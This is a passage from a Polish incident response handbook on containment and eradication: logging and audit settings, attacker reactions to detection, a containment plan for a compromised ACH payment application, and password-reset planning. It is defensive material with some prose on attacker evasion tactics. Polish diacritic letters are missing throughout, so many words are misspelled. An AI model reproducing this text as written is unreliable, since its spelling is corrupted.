Czasami te pewne organy cigania mog zada wstrzymania si z akcj naprawcz,
aby kontynuowa ledztwo i zdoby wicej informacji o hakerze lub mie czas na jego
aresztowanie. Taka sytuacja moe by korzystna, poniewa dziki temu moe uda si
opni podanie informacji o ataku do publicznej wiadomoci.
Akcja mieszana to podejcie polega na tym, e prowadzi si pewne dziaania tylko
w stosunku do wybranych aspektw incydentu. Stosuje si je, gdy ograniczenie zasigu
incydentu jest waniejsze ni ledztwo, ale istniej te podstawy do przeprowadzenia
penego ledztwa i kompletnej akcji naprawczej. Tego typu dziaania najczciej podejmuje
si w duych rodowiskach, w ktrych istnieje moliwo szybkiego oczyszczenia tylko
czci systemw. Przykadowo organizacja moe chcie jak najszybciej uwolni od
zagroenia jednostk biznesow, aby chroni reszt swoich struktur, oraz przeznaczy
wicej czasu na oczyszczenie pozostaych jednostek biznesowych. Podejcie to jest te
bardzo popularne w przypadku incydentw zwizanych ze strat pienidzy prawie
na bieco lub z kluczowymi danymi biznesowymi. Jeli np. haker zdoby dane
powiadczajce do tworzenia i autoryzowania transakcji elektronicznych ACH,
priorytetem jest natychmiastowe odcicie go od tych mechanizmw. Jednak dodatkowo
organizacja musi dokadnie okreli zasig incydentu i wdroy kompletny plan naprawczy,
aby mie pewno, e intruz nie zachowa dostpu do rodowiska. W takim przypadku
natychmiastowe uniemoliwienie hakerowi dostpu do pewnych systemw jest waniejsze
od cakowitego wyrugowania go ze rodowiska, cho to oczywicie te trzeba zrobi
w nastpnej kolejnoci.
Gdy zesp jest skompletowany i wybrano metod dziaania, mona rozpocz akcj.
W nastpnym podrozdziale opisujemy pierwsze zadanie zespou naprawczego utworzenie
wstpnego planu naprawy i ograniczenie zasigu incydentu w sposb zgodny z wybranym
sposobem dziaania.
OPRACOWYWANIE I WDRAANIE
WSTPNYCH RODKW ZARADCZYCH
Najpierw omwimy wstpne rodki zaradcze. Podejmuje si je w czasie trwania incydentu i powinny
by tak dobrane, aby wywieray jak najmniejszy wpyw na hakera. Ich celem jest dostarczenie
zespoowi ledczemu wikszej iloci informacji przez wczenie dodatkowych funkcji rejestracji
danych w dziennikach i dodanie monitorw. Wstpne rodki zaradcze mog mie kluczowe
znaczenie dla ledztwa, poniewa dostarczaj dodatkowych rde materiau dowodowego
i skracaj czas potrzebny na przeprowadzenie pniejszych faz procesu naprawczego.
Oto kilka przykadw typowych dziaa wykonywanych w ramach wstpnej akcji naprawczej.
Zwikszenie iloci danych rejestrowanych m.in. w nastpujcych dziennikach:
systemowych,
aplikacji,
sieciowych,
centralnego uwierzytelniania.
Centralizacja plikw dziennikw i systemu zarzdzania (wdroenie systemu zarzdzania
informacjami i zdarzeniami bezpieczestwa informatycznego SIEM).
Wczenie wikszej liczby alarmw.
Instalacja aktualizacji zewntrznych programw.
Implementacja uwierzytelniania wieloskadnikowego do rodowisk o kluczowym znaczeniu.
Redukcja liczby miejsc przechowywania wanych danych.
Podniesienie poziomu bezpieczestwa uwierzytelniania macierzystego.
Wiele z tych zabiegw mona przeprowadzi, zmieniajc typy danych przechowywanych
przez punkty kocowe. W systemach Linux do najatwiejszych dziaa wstpnych mona zaliczy
wczenie rejestracji historii polece i inspekcji procesw oraz rejestracji wszystkich przypadkw
uwierzytelniania. W systemach Windows mona w narzdziach inspekcji wczy rejestrowanie
w dziennikach zdarze powodzenia i poraki. To, jakie konkretnie zdarzenia zapisywa, zaley
od celu. Oto lista niektrych najczciej rejestrowanych typw zdarze.
Przeprowadzenie inspekcji zdarze logowania na kontach.
Przeprowadzenie inspekcji zarzdzania kontami.
Przeprowadzenie inspekcji zdarze logowania.
Przeprowadzenie inspekcji dostpu do obiektw.
Przeprowadzenie inspekcji uycia uprawnie.
Przeprowadzenie inspekcji ledzenia procesw.
Przeprowadzenie inspekcji zdarze systemowych.
Ostrzeenie Wczenie zdarze powodzenia Microsoft Windows dla zasad inspekcji Przeprowad inspekcj
dostpu do obiektw i Przeprowad inspekcj ledzenia procesw moe spowodowa szybkie
zapenienie lokalnego dziennika zdarze bezpieczestwa. Jeeli do tego dojdzie, dzienniki
zdarze bd zawieray wpisy dotyczce tylko bardzo krtkiego okresu. To drastycznie obnia
ich przydatno. Dlatego naley bacznie przyglda si skutkom wprowadzanych zmian
w zasadach rejestracji zdarze. Mona zwikszy maksymalny rozmiar plikw dziennika
lub skierowa zdarzenia do centralnego systemu rejestracyjnego.
Uwaga Jednym z czsto popenianych bdw jest mylenie, e rejestrowanie informacji tylko o nieudanych
zdarzeniach pozwoli wykry szkodliw aktywno. Nieraz mielimy do czynienia z organizacjami,
ktre koncentroway si wycznie na szukaniu informacji o bdach w przekonaniu, e w ten sposb
znajd dane dotyczce szkodliwej dziaalnoci (mylenie to bazuje na spostrzeeniu, e jeli co
jest szkodliwe, to jest niedozwolone, wic zostanie zaklasyfikowane jako nieudana prba zrobienia
czego). Cho oczywicie w niektrych przypadkach rzeczywicie tak jest, to jeli ledztwo dotyczy
dziaalnoci wci aktywnego hakera, trzeba te sprawdzi, do wykonywania jakich czynnoci
osobnik ten ma uprawnienia (wanie dziki nim jest aktywny). Aby zdoby peen obraz incydentu,
trzeba rejestrowa i monitorowa nie tylko aktywno niedozwolon, ale i dozwolon. Jeli np.
haker zdobdzie prawidowe dane powiadczajce, wszelka jego aktywno bdzie wystpowa
w kategorii dozwolonych czynnoci legalnego uytkownika. Gdyby sprawdzano tylko nieudane
prby aktywnoci, nie udaoby si tego wykry.
Innym typowym celem wstpnych czynnoci zaradczych jest zwikszenie poziomu bezpieczestwa
aplikacji lub systemu bez alarmowania hakera. Przed wprowadzeniem zwizanych z tym zmian
naley skonsultowa planowane dziaania z zespoem ledczym, ktry powinien wyda opini, czy
haker moe si zorientowa, e zosta wykryty, czy nie. Oto kilka przykadw tego typu czynnoci.
Usunicie skrtw LANMAN z caego rodowiska Windows.
Zwikszenie wymogw dotyczcych bezpieczestwa hase.
Aktualizacja bezpieczestwa zewntrznych aplikacji, ktre s czstym celem ataku hakerw.
Implementacja uwierzytelniania wieloskadnikowego w krytycznym rodowisku, ktrego
haker jeszcze nie odkry lub do ktrego jeszcze si nie dosta.
Likwidacja luki w aplikacji, przez ktr haker dosta si do rodowiska.
W niektrych przypadkach istnieje moliwo usunicia zagroonego systemu ze rodowiska.
Gdy uytkownicy systemw udaj si na urlop, systemy te poddaje si przebudowie, uywa do
czego innego albo pozostawia wyczone. Hakerzy spodziewaj si pewnych zawirowa w duych
rodowiskach. Jeli jednak dwadziecia pi z trzydziestu zainfekowanych systemw nagle zniknie
na kilka dni, haker najprawdopodobniej domyli si, e zosta wykryty. W takim przypadku intruz
moe zmieni narzdzia lub techniki dziaania, przez co zesp ledczy bdzie musia jeszcze raz
okreli zasig incydentu.
Inn czynnoci z repertuaru dziaa wstpnych, ktre mog pomc zespoowi ledczemu,
jest wstrzymanie wszelkiej legalnej aktywnoci na kontach, ktrych dane powiadczajce zostay
skradzione, utworzenie ich wacicielom nowych kont oraz wdroenie monitoringu na kontach
bdcych we wadaniu intruza. Dziki temu wiadomo, e wszelka aktywno na tych kontach,
majca miejsce po okrelonej dacie, jest zwizana ze szkodliw dziaalnoci hakera. To uatwia
ledczym odrnienie szkodliwej aktywnoci od legalnej. Przeprowadzenie takiej akcji moe by
jednak trudne w przypadku kont administracyjnych.
Skutki zaalarmowania hakera

Podjcie dziaa powodujcych, e haker orientuje si, i zosta wykryty, z reguy uwaa si za co
szkodliwego dla ledztwa. Intruz, wiedzc, e jest rozpoznany, prawdopodobnie sprbuje jako
zareagowa. Czasami reakcja ta moe by agodna, szczeglnie wtedy, gdy haker jest pewien, e
uda mu si utrzyma dostp do rodowiska lub gdy wykona ju swoj misj i nie ma powodu
duej pozostawa w rodowisku. Poniej przedstawiamy opis rodzajw reakcji, jakie najczciej
spotykamy w swojej praktyce.
Zmiana narzdzi, taktyki i procedur powoduje, e zesp RI musi skoncentrowa si
na reagowaniu na zmienn aktywno hakera zamiast na analizowaniu jego przeszych
dokona. Poza tym zmusza to zesp ledczy do wykonania dodatkowej pracy musi
znale wszystkie zmienione narzdzia oraz rozpracowa now taktyk i nowe procedury
hakera przy jednoczesnym kontynuowaniu analizy ladw poprzedniej dziaalnoci, aby
mie pewno, e niczego nie przeoczono. Moe te si przydarzy cakowita utrata z pola
widzenia aktywnoci hakera. Czasami zmiana narzdzi i taktyki moe by tak dotkliwa, e
bdzie trzeba podj natychmiastowe kroki zaradcze, przez co zespoy reakcji na incydent
musz zaj si likwidacj zagroe, zamiast skupi si na prowadzeniu ledztwa. To moe
umoliwi hakerowi zainstalowanie nowych mechanizmw utrzymywania dostpu
do rodowiska i zniweczy cay wysiek zespow ledczych.
Wstrzymanie aktywnoci jeli haker przestanie by aktywny, ledczy mog przeoczy
dowody szkodliwej dziaalnoci i umoliwi hakerowi pozostanie w ukryciu podczas procesu
likwidacji zagroenia po to, by po jego zakoczeniu wznowi aktywno. Jedn z technik
hibernacji jest zainstalowanie programu, ktry komunikuje si z serwerem dowodzcym co
kilka miesicy, skasowanie wszelkich szkodliwych programw i wchodzenie do rodowiska
wycznie za pomoc zdalnych rodkw dostpu (np. przez poczenie biznesowe albo sie
VPN), zainstalowanie konsoli sieciowych w strefie zdemilitaryzowanej (DMZ) i rozpoczcie
korzystania z nich dopiero, gdy zostanie zakoczony proces reakcji na incydent oraz
zaparkowanie wszystkich szkodliwych domen na niewinnie wygldajcych adresach IP
(np. nalecych do firmy Google).
Uwaga Niektrzy hakerzy lubi parkowa domeny na takich adresach IP jak localhost (127.0.0.1),
adresie emisji (255.255.255.255), adresach multiemisji (224.0.0.0 239.255.255.255) lub
adresach IP klasy E (zarezerwowanych przez IANA) 240.0.0.0 254.255.255.255. Niektre
z tych sztuczek s atwo wykrywane przez systemy wykrywania i zapobiegania wamaniom,
wic nie traktuje si ich jak powanego zagroenia. Sprytniejsi hakerzy parkuj swoje domeny
na niewyrniajcych si adresach IP.
Destrukcja to do rzadko wystpujce zjawisko, ale niektrzy hakerzy rozpoczynaj

ofensyw, aby odcign uwag zespou RI od analizy ladw starej aktywnoci i skierowa
j na nowo powstajce szkody. Przykadami takiej destrukcyjnej dziaalnoci s: usuwanie
plikw z systemw, niszczenie stron internetowych oraz wywoywanie awarii systemw.
Kiedy mielimy do czynienia z przypadkiem, w ktrym administrator systemu odkry,
e haker poczy si zdalnie z systemem i prowadzi w ten sposb szkodliw dziaalno.
Administrator postanowi odczy intruza od systemu. Ten natychmiast odpowiedzia
odciciem poczenia RDP administratora z serwerem i wyczeniem jego konta
uytkownika, a nastpnie dokoczy swoj prac.
Prba przytoczenia organizacji liczb zdobytych systemw kiedy pracowalimy
nad incydentem, w ktrym haker co noc instalowa za pomoc skryptw rne rodziny
backdoorw w kadym z czterdziestu kontrolerw domen wchodzcych w skad
rodowiska. Zmuszao to ledczych do koncentrowania si na nowych infekcjach,
zamiast na czymkolwiek innym, i przeprowadzania procesu naprawczego co noc. Nie dao
si tak pracowa i organizacja musiaa w kocu przebudowa wszystkie serwery oraz
wdroy biae listy aplikacji w cisym trybie blokowania we wszystkich kontrolerach
domen i najwaniejszych serwerach (np. poczty elektronicznej, sieciowych, udziaw
plikowych i SharePoint).
OPRACOWYWANIE I WDRAANIE RODKW

OGRANICZANIA ZASIGU INCYDENTU
Teraz przyjrzymy si metodom ograniczania zasigu incydentu. Dziaania te maj na celu
uniemoliwienie hakerowi wykonywania pewnych czynnoci, ktre s zbyt szkodliwe dla
organizacji, by je ignorowa. Akcje ograniczajce zazwyczaj wymagaj ekstremalnych rodkw
i wdraane w ich ramach rozwizania nie powinny by dugotrwae. Wdroenie planu ograniczenia
incydentu czsto nie powoduje usunicia dostpu hakera do rodowiska. Raczej uniemoliwia mu
tylko kontynuowanie pewnych czynnoci. Jeli np. haker kradnie due iloci danych osobowych
z serwera plikw, raczej naley natychmiast zakoczy ten proceder, a nie przeprowadza penego
rozeznania zakresu incydentu. W takim przypadku plan ograniczenia zasigu incydentu mgby
obejmowa odczenie bazy danych od internetu do czasu rozwizania sprawy lub uniemoliwienie
komunikacji z serwerem przez wszystkie systemy z wyjtkiem jednego hosta wstpnego.
Rozwizanie takie nie moe pozosta na stae, ale wstrzyma incydent na pewien czas, a uda si
w peni rozwiza problem.
Uwaga Planu ograniczania zasigu nie naley traktowa jak procesu likwidacji zagroenia, poniewa plan ten
z zasady okrela tymczasowe i drastyczne rozwizanie majce na celu powstrzymanie szkodliwej
aktywnoci, ktrej nie mona pozwoli na trwanie. Po wdroeniu tego planu nadal konieczne jest
przeprowadzenie penego ledztwa i procesu naprawczego, aby cakowicie pozby si hakera ze
rodowiska.
Aby opracowa kompletny plan ograniczajcy incydent, zespoy musz wiedzie, jakie dane
lub inne zasoby naley chroni. wiczenie to jest podobne do szerokich dyskusji, jakie tocz si
w organizacjach nad wstpnymi propozycjami zabezpiecze korporacyjnych, cho jest bardziej
skoncentrowane. Podczas tworzenia wstpnego planu dziaania ledczy powinni wsppracowa
z informatykami i specjalistami od zabezpiecze, aby mie pewno, e pod uwag zostan wzite
wszystkie moliwe rozwizania. Nawet jeli czonkowie zespou ledczego uwaaj, e dokadnie
rozumiej sposb dziaania hakera, plany ograniczania jego dziaalnoci powinny by jak najbardziej
szczegowe, a wic powinny uwzgldnia wszystkie moliwe rodzaje aktywnoci, nie tylko znane.
Wiele rodowisk jest tak duych i skomplikowanych, e informatycy po prostu nie znaj wszystkich
ich elementw, a przebiegy haker z pewnoci powici troch czasu na przeprowadzenie dokadnego
rozpoznania, aby zapewni sobie wiele moliwoci spenienia swojej misji. Wielu intruzw
przewiduje, e w pewnym momencie zostan wykryci bardziej dowiadczeni staraj si
zapewni sobie dostp do rodowiska nawet wtedy, gdy ich obecno wyjdzie na jaw i specjalici
odetn im podstawow drog dostpu.
Dalsze strategie ograniczania zasigu incydentw i sposoby ich wdraania opiszemy na
przykadzie konkretnego przypadku. Pewna firma niedawno odkrya, e haker wama si do jej
rodowiska finansowego o cile kontrolowanym dostpie. Intruz utworzy nieautoryzowane
przelewy elektroniczne na due sumy na konta w zagranicznych bankach. Zrobi to po zamaniu
utworzonej na wewntrzne potrzeby przedsibiorstwa aplikacji do tworzenia, autoryzowania
i przetwarzania transakcji elektronicznych.
W tej sytuacji zesp naprawczy powinien natychmiast wdroy plan ograniczania zasigu
incydentu, aby uniemoliwi hakerowi tworzenie kolejnych nieautoryzowanych przeleww.
Jest wiele moliwoci w tym zakresie, ale zesp musia trzyma si nastpujcych wytycznych.
Firma nie moga sobie pozwoli na straty funkcjonalnoci.
Haker miaby zachowa dostp do rodowiska, wic plan akcji ograniczajcej musia
uwzgldnia inne metody, jakimi haker mgby inicjowa przelewy elektroniczne lub
dostawa si do aplikacji finansowych.
Wiele tego rodzaju wama zostaje upublicznionych, wic firma musi by w stanie poda
dokadn dat, kiedy intruz zosta odcity od rodowiska finansowego. Najczciej jest to data
penego wdroenia kompletnego planu ograniczajcego. Niektre organizacje podaj t informacj
do wiadomoci publicznej, aby zachci klientw do wznowienia wsppracy.
Na podstawie przedstawionych kwestii i scenariusza moemy omwi moliwy plan dziaania.
Na myl od razu przychodz nastpujce cztery czynnoci.
1. Odcicie hakerowi dostpu do serwera, na ktrym znajduje si aplikacja finansowa
jedn z moliwoci jest implementacja list ACL (ang. Access Control List) zezwalajcych
na dostp do serwera tylko jednemu wybranemu systemowi, ktry bdzie peni rol bramy
wymagajcej dwuskadnikowego uwierzytelnienia i przepuszczajcej tylko ruch z kont
lokalnych. Konta lokalne naley utworzy tylko dla bardzo wskiego grona pracownikw,
ktrzy absolutnie musz mie dostp do aplikacji finansowej.
2. Uniemoliwienie hakerowi uwierzytelnienia si w aplikacji finansowej polega to na
zmianie hase wszystkich kont uytkownikw majcych dostp do aplikacji finansowej.
3. Wprowadzenie wymogu, aby w tworzeniu i autoryzowaniu kadej transakcji ACH bray

udzia dwie osoby technika ta polega na tym, e niektre konta uytkownikw mog
tworzy transakcje, a inne mog je autoryzowa, natomiast adne konto nie moe
wykonywa obu tych czynnoci.
4. Implementacja powiadomie dla wszystkich transakcji ACH aplikacja finansowa moe
wysya wiadomo e-mail do okrelonej grupy uytkownikw z informacj o kadym
wanym kroku w procesie tworzenia i autoryzowania transakcji.
Opisany powyej plan zapewnia skuteczne rodki pozbawiajce hakera dostpu do serwera
zawierajcego aplikacj finansow. Podsumowujc, moemy stwierdzi, e plan ten zakada
wdroenie sieciowych list ACL i systemu wstpnego z dwuskadnikowym uwierzytelnianiem
i ograniczeniem praw dostpu tylko dla kont lokalnych. Jednak na wypadek, gdyby przeoczono
jak metod dostpu do serwera wykorzystywan przez intruza, zastosowano te inne rodki
bezpieczestwa. Jest to dziaanie zgodne z koncepcj obrony gbokiej (ang. defense in depth),
zakadajc utworzenie wielu warstw ochronnych. Zmieniajc hasa do wszystkich kont
uytkownikw aplikacji finansowej, zmuszamy hakera do podjcia kolejnej prby wamania si
na ktre konto. Ponadto wymg udziau dwch kont w procesie tworzenia i autoryzacji
transakcji sprawia, e haker musi nauczy si rozrnia te dwa rodzaje kont i zama
zabezpieczenia przynajmniej jednego z kadego rodzaju. W kocu implementacja monitoringu
aplikacji finansowej pozwala na wykrycie nietypowych dziaa zwizanych z transakcjami ACH.
Pominlimy jedn wan rzecz. Wiesz, o co chodzi? Gdyby haker zainstalowa tylne drzwi
w systemie nalecym do rodowiska finansowego majcego bezporednie poczenie z internetem,
zachowaby dostp do aplikacji finansowej i mgby odzyska wstp do kont potrzebnych mu do
kontynuowania nielegalnej aktywnoci. Aby pokrzyowa mu te plany, naley zaimplementowa
listy ACL zezwalajce na komunikacj serwera aplikacji finansowej tylko z systemami, ktre s
bezporednio potrzebne do prowadzenia dziaalnoci. W ten sposb uniemoliwiono by wirusowi
zainstalowanemu przez hakera komunikowanie si z jego serwerem dowodzcym. Pamitaj, e
plan ograniczajcy zagroenie musi by jak najbardziej kompletny, aby uniemoliwia hakerowi
kontynuacj dziaalnoci oraz by firma moga poda konkretn dat rozwizania problemu.
Plany ograniczania dziaalnoci hakera z reguy opracowuje si i wdraa, zanim jeszcze
dokadnie wiadomo, jaki jest zasig incydentu. Dlatego naley tymczasowo wprowadza nawet
radykalne rodki bezpieczestwa, ktre pniej bdzie mona troch rozluni po przeprowadzeniu
penego procesu naprawczego. Dalsze wysiki w zakresie naprawy sytuacji naley skupi na
odciciu dostpu hakerowi do rodowiska i wzmocnieniu zabezpiecze, aby nie dopuci do
powtrzenia si podobnej sytuacji w przyszoci. Kompletny plan naprawczy obejmuje kilka
trwaych rozwiza bezpieczestwa.
Uwaga Po wdroeniu planu ograniczania dziaalnoci hakera zesp RI powinien spodziewa si reakcji
ze strony intruza. Zesp naprawczy powinien dodatkowo pracowa nad ulepszonymi metodami
rejestracji danych w dziennikach, sposobami monitorowania oraz alarmowania, aby mona byo
skutecznie reagowa na kolejne przypadki szkodliwej aktywnoci wykrywane poza rodowiskiem
objtym dziaaniami wstpnymi.
Jako e omawiamy prawdziwe przypadki i problemy, warto te powici troch miejsca temu,
co si dzieje, gdy co pjdzie nie po naszej myli. Powiedzmy, e pi dni po wdroeniu planu
ograniczania aktywnoci hakera zesp ledczy odkrywa, e intruz nadal ma dostp do aplikacji
finansowej. Oznacza to, e prawdopodobnie przeoczono jaki mechanizm, ktrym posugiwa si
haker. Zespoy naprawczy i ledczy powinny wsppracowa, aby wsplnymi siami dowiedzie si,
jak haker zachowa lub odzyska dostp do aplikacji finansowej. Dysponujc t wiedz, zesp
naprawczy bdzie mg natychmiast wdroy nowe rodki zapobiegawcze przeciw rozprzestrzenianiu
si incydentu. Jeli zdono ju poda do publicznej wiadomoci dat zabezpieczenia rodowiska,
konieczne moe by wydanie sprostowania.
Po wdroeniu wstpnego planu naprawy i ograniczeniu aktywnoci hakera kolejnym krokiem
jest opracowanie planu cakowitej likwidacji zagroenia. Jego opis znajduje si w nastpnym
podrozdziale.
PLAN OSTATECZNEJ LIKWIDACJI ZAGROENIA

Celem procesu likwidacji zagroenia jest cakowite pozbycie si hakera ze rodowiska. Akcja
powinna by przeprowadzona szybko, a jej efektem musi by cakowite uwolnienie rodowiska
organizacji od problemu zwizanego ze szkodliw dziaalnoci intruza. W odrnieniu od procesu
ograniczajcego dziaalno hakera, ktrego celem jest odcicie intruza od wybranego segmentu sieci,
programu lub skadu danych, plan likwidacji zagroenia ma na celu cakowite uniemoliwienie
hakerowi dostpu do rodowiska. Powodzenie procesu likwidacji zaley od tego, czy zesp
ledczy w peni okreli zasig incydentu, oraz od moliwoci organizacji w zakresie wdraania
proponowanych rozwiza. Cele planu likwidacji zagroenia s nastpujce.
Uniemoliwienie hakerowi dostpu do rodowiska.
Odcicie dostpu hakera do zdobytych systemw, kont i danych.
Usunicie luki wykorzystanej przez intruza w celu uzyskania dostpu do rodowiska.
Przywrcenie zaufania organizacji do swoich systemw komputerowych i kont uytkownikw.
Uwaga Przy opracowywaniu planu likwidacji zagroenia naley bra pod uwag tak ewentualno,
e haker moe prbowa odzyska dostp do rodowiska zarwno podczas przeprowadzania akcji,
jak i po jej zakoczeniu. Trzeba pamita, e haker moe wielokrotnie ponawia prby wamania
si do systemw przy uyciu wczeniej wykorzystanych metod oraz e moe szuka innych luk
w zabezpieczeniach. Poza tym intruz moe podj prb ukarania organizacji za odcicie mu
dostpu do rodowiska.
Poniej znajduje si lista przykadowych czynnoci, jakie mona wykona w procesie likwidacji
zagroenia. Poniewa jednak kady incydent jest inny, lista ta moe si zmienia.
Odczenie organizacji, ktra pada ofiar hakera, od internetu na czas procesu likwidacji
zagroenia.
Blokowanie gronych adresw IP.
Blackholing (lub sinkholing) nazw domen.

Zmiana hase do kont wszystkich uytkownikw.
Segmentacja sieci.
Usunicie luki w zabezpieczeniach, ktra umoliwia hakerowi wtargnicie do rodowiska.
Odbudowa zdobytych przez hakera systemw.
W wikszoci organizacji najlepszym czasem na przeprowadzenie procesu likwidacji zagroenia
jest weekend, poniewa w tych dniach szkody dla prowadzonej dziaalnoci s najmniejsze. Innym
czynnikiem, jaki naley uwzgldni przy wyborze czasu akcji, s typowe godziny aktywnoci
hakera. Przeprowadzenie procesu w czasie, gdy haker jest mao aktywny, daje wiksze szanse
na powodzenie operacji.
Im duej trwa proces eradykacji, tym wiksze ryzyko, e haker zdoa odzyska dostp
do rodowiska w jego trakcie. O rodzaju podejmowanych rodkw powinno si decydowa
w zalenoci od tego, jak powany jest incydent, ale typowym rozwizaniem jest odczenie
internetu na czas przeprowadzania akcji, aby uniemoliwi hakerowi wdarcie si do rodowiska
i pokrzyowanie nam planw. Wyobra sobie, jak wiele czasu i zasobw zostaoby zmarnowane,
gdyby po miesicu planowania szeroko zakrojonego procesu likwidacji zagroenia okazao si,
e haker wykorzysta przeoczone tylne drzwi i wama si do dodatkowych systemw.
Jeli haker odzyska dostp do rodowiska podczas procesu eradykacji, zesp przeprowadzajcy
akcj ma kilka moliwoci dziaania. Jedn z nich jest szybka reakcja w celu ograniczenia zasigu
tego nowego incydentu. Jednoczenie zesp ledczy powinien na bieco rozpracowywa metod
wykorzystan przez hakera do ponownego wejcia do rodowiska. Po wykryciu i udaremnieniu tej
metody mona kontynuowa likwidacj zagroenia. Inn moliwoci jest odoenie procesu
eradykacji na pniej i wszczcie od nowa procesu reakcji na incydent. Takie dziaanie jest bardziej
odpowiednie, gdy haker zdobdzie dostp na dugi czas i wamie si do wikszej liczby systemw,
ni da si oczyci w zaplanowanym czasie procesu eradykcji.
Projektowanie planu likwidacji zagroenia jest zazwyczaj atwiejsze ni opracowywanie innych
planw w ramach procesu naprawczego, poniewa istnieje ograniczona liczba dziaa, jakie mona
podj w celu wyrugowania intruza ze rodowiska. Aby np. oczyci system, w ktrym doszo do
wamania, plan eradykacji powinien obejmowa odbudow systemw ze znanego czystego nonika
lub przeprowadzenie dokadnej procedury majcej na celu usunicie szkodliwego oprogramowania
z systemu. Ponadto, jeli doszo do kradziey danych powiadczajcych, naley zmieni haso do
konta uytkownika lub wyczy bd usun konto uytkownika i utworzy nowe. Niestety to,
e plan likwidacji mona w miar atwo opracowa, nie znaczy, e rwnie atwo mona go wdroy
jest wrcz przeciwnie.
Najczstsz przyczyn niepowodzenia procesw likwidacji zagroenia jest niedostateczne
planowanie. Oglnie rzecz biorc, im wicej czasu powici si temu etapowi, tym krcej trwa
wdraanie planu i mniej rzeczy moe si nie uda. Przykadowo pewna organizacja moe
stwierdzi, e na czas procesu eradykacji chce odczy internet. Jednak wikszo organizacji
nie moe sobie pozwoli na cakowite odcicie internetu, poniewa posiada aplikacje biznesowe,
ktre musz dziaa nieprzerwanie (wyobra sobie zniknicie z internetu na cay weekend duego
midzynarodowego banku). Dlatego najczciej pewne wyznaczone systemy w jednej lub wikszej
liczbie stref DMZ zachowuj dostp do sieci oglnowiatowej. Z tego powodu zesp naprawczy
musi przedsiwzi pewne dodatkowi kroki. Oto one.
Sprawdzenie, czy te krytyczne dla dziaalnoci biznesowej systemy nie maj dostpu
do systemw spoza ich strefy DMZ.
Zapewnienie cznoci sieciowej midzy miejscami oddalonymi geograficznie, aby rne
zespoy IT mogy wdraa dziaania zwizane z likwidacj zagroenia.
Sprawdzenie, ktre poczenia biznesowe mona wyczy, a ktre musz cay czas dziaa.
W przypadku tych drugich zesp naprawczy musi zadba o to, by nie przechodzi przez nie
ruch wychodzcy do internetu.
Poczenia VPN najprawdopodobniej musz by pozostawione, aby pracownicy IT
mogli pracowa zdalnie i implementowa punkty planu eradykacji. Jednak liczba kont
uytkownikw uprawnionych do czenia si z sieci VPN w czasie trwania procesu
eradykacji powinna by ograniczona do czonkw zespow ledczego i naprawczego oraz
pracownikw IT. Dodatkowym rodkiem bezpieczestwa jest wyczenie opcji tunelowania
dzielonego (ang. split tunelling).
Kady system, ktry ma zosta poczony (zdalnie lub na miejscu) ze rodowiskiem,
w jakim doszo do wamania, w celu przeprowadzania prac eradykacyjnych musi zosta
dokadnie sprawdzony.
Patrzc na t list, atwo si zorientowa, e pewne pozornie atwe czynnoci, takie jak
odczenie internetu, mog w istocie by bardzo trudne do wykonania w rodowisku operacyjnym.
Inn czasami trudn do przeprowadzenia czynnoci jest zmiana hase do wszystkich kont
uytkownikw. Trzeba to zrobi w rnych systemach operacyjnych, np. Windows, Linux i Mac,
nie mona zapomnie o kontach zakodowanych na stae w aplikacjach, kontach baz danych oraz
wszystkich kontach zwizanych ze sprztem sieciowym, ktre take mog by celem ataku hakera
(np. zapr sieciowych, systemw wykrywania i zapobiegania wamaniom, routerw, przecznikw
itd.). Chodzi o to, by uniemoliwi hakerowi korzystanie ze wszystkich skradzionych danych
powiadczajcych, a nie tylko tych, ktre udao si odkry zespoowi ledczemu. Ponadto dobrym
pomysem, jeli jest na to czas, jest przeprowadzenie inspekcji kont uytkownikw i powizanie ich
z fizycznymi kontami uytkownikw. Do kont uytkownikw zaliczaj si przynajmniej:
standardowe konta systemw Windows, Linux i Mac;
konta usugowe;
konta administratorw lokalnych i uytkownikw root;
konta zintegrowane z lokaln baz danych powiadczajcych (Microsoft Active Directory,
inne rozwizanie LDAP lub NIS);
konta aplikacji;
konta urzdze sieciowych;
konta baz danych.
Trzy ostatnie typy kont aplikacji, urzdze sieciowych i baz danych w niektrych
przypadkach mona pomin. Ilo czasu powicona na zmienianie hase do wszystkich kont
powinna bezporednio wynika z moliwoci zespou naprawczego w zakresie implementacji
zalece oraz tego, na czym skupia swoj dziaalno haker. Wymuszenie zmiany hase na kontach
uytkownikw to zazwyczaj atwe zadanie. Najwiksze wtpliwoci moe budzi moliwo, e to
wanie haker bdzie t osob, ktra si zaloguje i dokona zmiany hasa. Jest kilka moliwoci
rozwizania tego trudnego problemu. Jedn z nich, cho przez nas niezalecan, jest po prostu
pogodzenie si z ryzykiem. Zalet tego rozwizania jest atwo wdroenia, poniewa wychodzimy
z zaoenia, e pozostae kroki planu eradykacji uniemoliwi hakerowi pozostanie w rodowisku.
Ewentualnie mona automatycznie wygenerowa nowe hasa do wszystkich kont i przekaza je
w bezpieczny sposb odpowiednim osobom. Jeszcze innym wyjciem jest nakazanie uytkownikom
wykonania telefonu do pomocy technicznej, aby otrzyma dostp do sieci VPN w celu zmiany hasa.
Zmiana hase kont usugowych zawsze jest atwa, cho operacj t trzeba dobrze zaplanowa,
aby przewidzie jej skutki. Zanim dokonasz zmiany hase do kont usugowych, sprawd, ktre
aplikacje z nich korzystaj, a nastpnie zidentyfikuj wszystkie systemy, w jakich te aplikacje s
zainstalowane. Jest to konieczne, poniewa hasa do kont usugowych musz zosta zmienione
w kadym systemie, w ktrym s wykorzystywane, oraz w orodku centralnym. Podczas procesu
planowania prawie na pewno niektre systemy lub aplikacje zostan przeoczone. Dlatego naley
mie te plan awaryjny na wypadek wystpienia problemw z systemami i aplikacjami. Czsto
problemy te zostaj wykryte dopiero po zakoczeniu procesu likwidacji zagroenia i przywrceniu
aplikacji do normalnego dziaania.
Kolejnym bardzo trudnym zadaniem jest zmiana hasa lokalnego administratora w kadym
systemie. W niektrych organizacjach po prostu akceptuje si ryzyko zwizane z tymi kontami
i albo pozostawia si ich hasa bez zmian, albo ustawia si takie samo haso dla wszystkich
lokalnych kont administracyjnych. Niektre organizacje tworz skrypty do ustawiania (i ledzenia)
niepowtarzalnych hase wszystkich lokalnych kont administratorw, a inne wdraaj skady
danych powiadczajcych, instaluj specjalne oprogramowanie do randomizowania hase
i nakazuj administratorom pobieranie hase dla lokalnych kont administracyjnych. Jeszcze
innym rozwizaniem jest wyczenie moliwoci logowania zdalnego i RDP z lokalnych kont
administracyjnych lub w ogle wyczenie tych kont. Wybr metody ochrony lokalnych kont
administracyjnych zaley od rodowiska i zasad przyjtych w organizacji.
Ostatni kwesti, ktr naley uwzgldni przy opracowywaniu planu likwidacji zagroenia,
